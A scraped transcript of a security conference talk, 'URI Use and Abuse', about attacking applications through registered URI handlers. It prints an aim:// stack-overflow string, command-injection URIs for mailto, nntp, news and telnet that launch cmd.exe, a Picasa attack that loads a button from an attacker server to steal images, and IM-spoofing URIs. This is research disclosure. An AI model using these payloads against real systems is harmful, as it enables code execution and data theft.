Presentation is loading. Please wait.

Presentation is loading. Please wait.

URI Use and Abuse P\/\/N1ch1\/\/4. Contributing Authors Nathan McFeters – Senior Security Analyst – Ernst & Young Advanced Security Center, Chicago Billy.

Published byTimothy Rollins Modified over 10 years ago

Similar presentations

Presentation on theme: "URI Use and Abuse P\/\/N1ch1\/\/4. Contributing Authors Nathan McFeters – Senior Security Analyst – Ernst & Young Advanced Security Center, Chicago Billy."— Presentation transcript:

1 URI Use and Abuse P\/\/N1ch1\/\/4

2 Contributing Authors Nathan McFeters – Senior Security Analyst – Ernst & Young Advanced Security Center, Chicago Billy Kim Rios – Senior Researcher – Microsoft, Seattle Rob Carter – Security Analyst – Ernst & Young Advanced Security Center, Houston

3 URIs – An Overview Generic –http://, ftp://, telnet://, etc. What else is registered? –aim://, firefoxurl://, picasa://, itms://, etc.

4 URIs – Interaction With Browsers Developers create URI hooks in the registry for their applications Once registered they can be accessed and interacted with through the browser XSS can play too!

5 URI Discovery – Where and What? RFC 4395 defines an IANA-maintained registry of URI Schemes W3C maintains *retired* schemes AHA! The registry! Enter DUH!

6 DUH Tool – Sample Output

7 Attacking URIs – Attack Scope URIs link to applications Applications are vulnerable to code flaws and functionality abuse URIs can be accessed by XSS exposures

8 Stack Overflow in Trillians aim.dll Through the aim:// URI The aim:// URI is associated with the command Rundll32.exe C:\Program Files\Trillian\plugins\aim.dll, aim_util_urlHandler url=%1 ini="c:\program files\trillian\users \default\cache\pending_aim.ini.

9 Stack Overflow in Trillians aim.dll Through the aim:// URI Attacker controls the value that is put into aim_util_urlHandler through the URI, such as aim://MyURL. Value is copied without bounds checking leading to a stack overflow

10 Stack Overflow in Trillians aim.dll Through the aim:// URI Example: aim:///#1111111/11111111111111111111111111111111111 1111111111111111111111111122222222222222222222222 2222222222222222222222222222222222222233333333333 3333333333333333333333333333333333333333333333333 3444444444444444444444444444444444444444444444444 4444444444444555555555555555555555555555555555555 55555555555555555555555556666666AAAABBBB6666666 6666666666666666666666666666666666666666666666666 6666677777777777777777777777777777777777777777777 7777777777777777788888888888888888888888888888888 8888888888888888888888888888899999999999999999999 9999999999999999999999999999999999999999900000000 0000000000000000000000000000000000000000000000000 0000

11 Stack Overflow Caught By OllyDbg

12 Control of Pointer to Next SEH Record and SE Handler

13 Command Injection in Call to Trillians aim.dll Through XSS The command associated with aim:// takes two arguments, URL (which we control) and ini, which is set by default to C:\Program Files\Trillian\users \default\cache \pending_aim.ini.

14 Command Injection in Call to Trillians aim.dll Through XSS Attacker can inject a to close off the uri command line argument and can then inject a new ini parameter. The ini parameter is used to specify a file location to write startup data to. We can control some of that startup data through the aim:// URI.

15 Command Injection in Call to Trillians aim.dll Through XSS

16 Cross Browser Scripting – IE pwns Firefox and Netscape Navigator Firefox and Netscape Navigator 9 register URIs to be compliant with Windows Vista. These URIs (firefoxurl and navigatorurl) are vulnerable to command injection when called from IE. Gecko based browsers accept the –chrome argument, and we can inject this to supply arbitrary JavaScript code that allows us to spawn a command prompt.

17 Cross Browser Scripting – IE pwns Firefox and Netscape Navigator

18 Command Injection in Firefox and All Gecko Based Browsers Gecko based browsers do not properly sanitize the values passed to several URIs and this can lead to a command injection thru XSS. FF < 2.0.0.6 = vulnerable, everything else, STILL vulnerable at this time. Browser is tricked into associating the URL with a registered file handler as opposed to the URL handler for the URI.

19 Command Injection in Firefox and All Gecko Based Browsers The following URIs will cause a command injection: –mailto:%00%00../../../../../../windows/system32/cmd".exe../../../../../../../../windows/system32/calc.exe " - " blah.bat –nntp:%00%00../../../../../../windows/system32/cmd".exe../../../../../../../../windows/system32/calc.exe " - " blah.bat –news:%00%00../../../../../../windows/system32/cmd".exe../../.. /../../../../../windows/system32/calc.exe " - " blah.bat –snews:%00%00../../../../../../windows/system32/cmd".exe../../../../../../../../windows/system32/calc.exe " - " blah.bat –telnet:%00%00../../../../../../windows/system32/cmd".exe../../.. /../../../../../windows/system32/calc.exe " - " blah.bat

20 Command Injection in Firefox and All Gecko Based Browsers

21 Enter Firefox 2.0.0.6 Not quite fixed yet… Anyone see PDPs Quicktime flaw which use our chrome javascript shell code? Everything fixed in 2.0.0.7, or is it?

22 Trust-based Applet Attack against Googles Picasa (T-bAG) picasa://importbutton?url= http://shadyshady.com/evilbutton.xml Yep, thats right it imports a remote XML description of a button If that button is loaded from OUR server and clicked we get to see all those naughty pictures of your girlfriend

23 The Plan – Ghetto Whiteboard Edition

24 The Plan – Ghetto Diagram Edition Victims Web Browser The Hacker YouTube, MySpace Attack Server Hacker Plants XSS Victim Gets Pwned Victim Loads Flash, DNS Rebind, Images Stolen

25 Trust-based Applet Attack against Googles Picasa (T-bAG) The button.xml file looks like so: Critical Update Available Click to Download Critical Update

26 Trust-based Applet Attack against Googles Picasa (T-bAG) When the button is clicked, Picasa starts up its own instance of Internet Explorer to open up whatever is at http://natemcfeters.com/pwn.py The real interesting thing is what Picasa SENDS:

27 Whats Sent by Picasa?!

28 Why Flash? We chose Flash to exploit our client-side attack vector for three reasons: –1. It is vulnerable to DNS Rebinding attacks. –2. If a valid crossdomain.xml file is present we can connect back to our attack server. –3. As of Actionscript 3.0 we now have access to a Socket class that can read and write raw binary data.

29 Trust-based Applet Attack against Googles Picasa (T-bAG)

30 Stupid IM Tricks I want to talk to your girlfriend as if Im you! –ymsgr:sendim?yourGirlFriend&m=I+think+we+sho uld+break+up…+sorry+but+its+you+not+me –gtalk:chat?jid=Pwn1ch1wa@gmail.com –gtalk:call?jid=Pwn1ch1wa@gmail.com –gtalk:voicemail?jid=Pwn1ch1wa@gmail.com –aim:goim?screenname=yourGirlFriend&m=I+really +think+youd+be+happier+with+Nate –skype, Gadu-Gadu, Jabber, etc.

31 Yep, Theyre Stupid, but… Aside from stealing your girlfriend and causing a Denial of Service on you… What if you could XSS a lot of people from one page and then force their browsers to loop through sending as many of these messages as possible? DDoS on all chat providers anyone?

32 Whats Next? *Nix Anyone? Why oh why is no one talking about *Nix yet. Why? No registry… or is there? AHA! DUH4Linux.sh! #!/bin/bash gconftool-2 /desktop/gnome/url-handlers --all-dirs | cut --delimiter=/ -f 5 | while read line; do { gconftool-2 /desktop/gnome/url-handlers/$line -a | grep -i 'command' | cut --delimiter== -f 2 | while read line2; do { echo "$line $line2" } done

33 Output from DUH 4 Linux -bash-3.00$./DUH4Linux.sh mangnome-help "%s" cdda /usr/libexec/gnome-cdda-handler %s aim gaim-remote uri "%s" info gnome-help "%s" server-settings nautilus "%s" applications nautilus "%s" https firefox %s unknown mozilla "%s" ghelp gnome-help "%s" h323 gnomemeeting -c %s about firefox %s trash nautilus "%s" http firefox %s system-settings nautilus "%s" callto gnomemeeting -c %s mailto evolution %s

34 Conclusions and Questions Any questions?

Download ppt "URI Use and Abuse P\/\/N1ch1\/\/4. Contributing Authors Nathan McFeters – Senior Security Analyst – Ernst & Young Advanced Security Center, Chicago Billy."

Similar presentations

WordPress Installation for Beginners Sheila Bergman

WordPress Installation for Beginners Sheila Bergman
Web 2.0 Programming 1 © Tongji University, Computer Science and Technology. Web Web Programming Technology 2012.

Web 2.0 Programming 1 © Tongji University, Computer Science and Technology. Web Web Programming Technology 2012.
Slipping Past the Firewall DNS Rebinding with Pure Java Applets Billy K Rios (BK) and Nate McFeters.

Slipping Past the Firewall DNS Rebinding with Pure Java Applets Billy K Rios (BK) and Nate McFeters.
Module XII Web Application Vulnerabilities

Module XII Web Application Vulnerabilities
Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Google Series Part 1: gmail Part 2: maps Part 3: talk Part 4: earth Part 5: books Part 6: picasa Part 7: sites Part x: ?

Google Series Part 1: gmail Part 2: maps Part 3: talk Part 4: earth Part 5: books Part 6: picasa Part 7: sites Part x: ?
Incident Handling & Log Analysis in a Web Driven World Manindra Kishore.

Incident Handling & Log Analysis in a Web Driven World Manindra Kishore.
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
WEB BROWSER SECURITY By Robert Sellers Brian Bauer.

WEB BROWSER SECURITY By Robert Sellers Brian Bauer.
©2009 Justin C. Klein Keane PHP Code Auditing Session 3 – Tools of the Trade & Crafting Malicious Input Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 3 – Tools of the Trade & Crafting Malicious Input Justin C. Klein Keane
HTTP Cookies. CPSC 441 - Application Layer 2 User-server state: cookies Many major Web sites use cookies Four components: 1) cookie header line of HTTP.

HTTP Cookies. CPSC Application Layer 2 User-server state: cookies Many major Web sites use cookies Four components: 1) cookie header line of HTTP.
1 Configuring Internet- related services (April 22, 2015) © Abdou Illia, Spring 2015.

1 Configuring Internet- related services (April 22, 2015) © Abdou Illia, Spring 2015.
EECS 354 Network Security Cross Site Scripting (XSS)

EECS 354 Network Security Cross Site Scripting (XSS)
1 Configuring Web services (Week 15, Monday 4/17/2006) © Abdou Illia, Spring 2006.

1 Configuring Web services (Week 15, Monday 4/17/2006) © Abdou Illia, Spring 2006.
Advanced Security Center Overview Northern Illinois University.

Advanced Security Center Overview Northern Illinois University.
Mastering the Internet, XHTML, and JavaScript Chapter 2 Web Browsers.

Mastering the Internet, XHTML, and JavaScript Chapter 2 Web Browsers.
CS 290C: Formal Models for Web Software Lecture 1: Introduction Instructor: Tevfik Bultan.

CS 290C: Formal Models for Web Software Lecture 1: Introduction Instructor: Tevfik Bultan.
The World Wide Web and the Internet Dr Jim Briggs 1WUCM1.

The World Wide Web and the Internet Dr Jim Briggs 1WUCM1.
TRIRIGA Anywhere 10.4 Beta Registration Steps

TRIRIGA Anywhere 10.4 Beta Registration Steps
Adobe Connect User Guide. Adobe Connect Meeting is an online-based tool that lets you to connect with colleagues, classmates, or anyone else around the.

Adobe Connect User Guide. Adobe Connect Meeting is an online-based tool that lets you to connect with colleagues, classmates, or anyone else around the.

Similar presentations

Ads by Google